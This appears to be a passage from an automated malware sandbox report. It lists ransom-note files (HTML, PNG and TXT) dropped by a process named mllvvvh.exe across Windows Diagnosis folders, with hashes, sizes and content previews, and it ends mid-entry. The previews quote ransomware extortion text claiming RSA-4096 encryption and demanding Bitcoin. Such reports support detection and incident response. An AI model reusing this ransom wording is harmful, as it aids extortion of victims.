                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\Scripts\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\Scripts\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\Scripts\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\Sideload\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\Sideload\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\Sideload\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\Siufloc\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:modified
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\Siufloc\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\Siufloc\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\SoftLandingStage\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\SoftLandingStage\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\SoftLandingStage\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\SoftLanding\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\SoftLanding\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\SoftLanding\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\TenantStorage\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\TenantStorage\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\TenantStorage\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
